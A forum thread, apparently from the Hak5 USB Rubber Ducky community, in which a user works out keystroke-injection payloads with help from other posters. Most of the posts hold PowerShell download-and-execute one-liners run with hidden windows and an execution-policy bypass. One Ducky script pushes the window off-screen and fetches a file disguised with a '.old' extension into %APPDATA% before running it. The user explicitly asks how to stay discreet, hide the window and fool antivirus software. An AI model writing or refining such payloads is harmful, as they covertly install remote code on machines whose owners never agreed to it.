Source_Writer

Any recent feedback about that problem ?

Hello Is there a way to maintain a key and press another key 2 times ? I mean = Maintain ALT and press SHIFT two times ? I want to use that way to "force" the keyboard to stay QWERTY before I write the next commands. Thanks for your advices.

I found some help and get this code. It works perfectly : powershell -w Hidden -ExecutionPolicy Bypass -Command "$wc=new-object System.Net.WebClient;$file=Join-Path $env:TEMP 7z1601.exe;$wc.DownloadFile('http://d.7-zip.org/a/7z1601.exe',$file);& $file"

Hello I have this script below. I didn't manage to hide the powershell box. If I add -w hidden the script doesn't work powershell -ExecutionPolicy UnRestricted (new-object System.Net.WebClient).DownloadFile('http://d.7-zip.org/a/7z1601.exe','%TEMP%\7z1601.exe');&'%TEMP%\7z1601.exe' Have you some ideas ? Thanks in advance.

I just found this thread on the forum: http://security.stackexchange.com/questions/95576/bad-usb-attack-possible-while-screen-is-locked

Hey I was thinking. If we ask to the USB RD to locked the screen, does the USB RD will be able to still open a GUI + r and write commands in background etc ? I mean : DELAY 1000 WINDOWS L // lock the screen GUI r // Does the USB will be able to open it or it will just write on the locked screen only ? etc In this way it will be very discreet but I really doubt it could works. What do you think about "that" ?

I readed some article and arrived to that result (I didn't test it yet) : DELAY 20000 GUI r DELAY 300 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER STRING powershell -windowstyle hidden do{sleep 5;(New-Object Net.WebClient).DownloadFile('http://site.com/file.old','%APPDATA%\file.exe')}while(!$?);&'%APPDATA%\7z1601.exe' ENTER What do you think about that final code ?

@White Light: Thanks for the #6 About the #7 You think the powershell script (https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---powershell-wget---execute) can't work properly ? @Broti: Thanks for the #5 and #6. What do you think about the #7 ?

Thanks for your answers. 6. Depends on the destination computer. 30s is a very long time. For me it's generally done in under 10s. Ok. And the RD script starts after this first installation time I guess yes ? I don't need to set 15 sec delay so ? 7. That just renames the file, it doesn't "convert" it. Using a different extension like .old may fool some AVs, but don't rely on that. Ok. It just rename the file so my code above is correct ? STRING $source = "site.com/file.old"; $destination = "%APPDATA%\file.exe"; Invoke-WebRequest $source -OutFile $destination; I'm just scary now to keep the focus on the hidden powershell windows opened/keep it on the first plan.. I guess there is no solution.

Hello On my W7 Ultimate laptop I plan to use the RD like a classic HID. I keep the original SD card and the original duck firmware (duck.hex). I don't need that RD is recognized like a drive and I'll use this script = https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---powershell-wget---execute . Here is my question for my actual situation : 1) Is it necessary to flash my SD card (for fat32 or something else) ? 2) I would like to use this script below. Is there a way to keep the focus on the hidden powershell windows opened/keep it on the first plan (to let the time to write the code lines) ? : 3) I saw the RD license (for the driver) is a classic one, a better one will increase the price of RD I readed. So do you know where I could buy this kind of "better license" ? I would like this especially to not have problems of compatibility and get a very fast driver installation for the first RD connection. 4) For a laptop (W7 Ultimate) is it better to use GUI R, WINDOWS R, CONTROL ESCAPE ? 5) To make my script, is it better to use ? : / Duck Toolkit 1 = http://ducktoolkit-411.rhcloud.com/Encoder.jsp / Duck Toolkit 2 = http://www.ducktoolkit.com / USB Rubber Ducky Tool = https://forums.hak5.org/index.php?/topic/36708-tool-usb-rubber-ducky-tool / Ducky Encoder = https://forums.hak5.org/index.php?/topic/32943-encoder-duckyencoder-gui-10-editor-with-syntax-highlighting 6) The driver installation for the first RD connection will ask something like 10 seconds, 30 seconds or more ? 7) For the powershell command is it better to use only .exe extension or .old/.apk ? What are the advantages ? The conversion old/apk => exe works everytime ? 8) The laptop where I'll plug the RD need Java installed or not ? Thanks in advance. SW